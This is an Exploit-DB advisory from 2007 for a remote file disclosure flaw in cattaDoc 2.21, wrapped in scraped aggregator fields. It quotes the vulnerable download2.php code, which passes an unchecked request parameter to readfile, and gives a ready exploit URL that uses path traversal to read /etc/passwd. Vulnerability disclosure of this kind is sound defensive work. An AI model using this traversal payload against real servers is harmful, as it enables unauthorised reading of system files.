Lucene search

K
exploitdbGoLd_MEDB-ID:3677
HistoryApr 06, 2007 - 12:00 a.m.

cattaDoc 2.21 - 'download2.php?fn1' Remote File Disclosure

2007-04-0600:00:00
GoLd_M
www.exploit-db.com
27

AI Score

7.4

Confidence

Low

# cattaDoc 2.21(download2.php fn1)Remote File Disclosure Vulnerability
# D.Script: http://cattadoc.com/download/cattadoc-2.21.tgz
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# V.Code: 
##############################################################
# $tp = $_REQUEST['mtp'];                                    # 
# $ofn = '"'.$_REQUEST['fn2'].'"';                           # 
# header("Content-type: $tp");                               #
# header("Content-Disposition: attachment; filename=$ofn");  #
# readfile($_REQUEST['fn1']); <<----                         #
##############################################################
# Exploit:[Path_cattaDoc]/download2.php?fn1=../../../../../../etc/passwd

# milw0rm.com [2007-04-06]

AI Score

7.4

Confidence

Low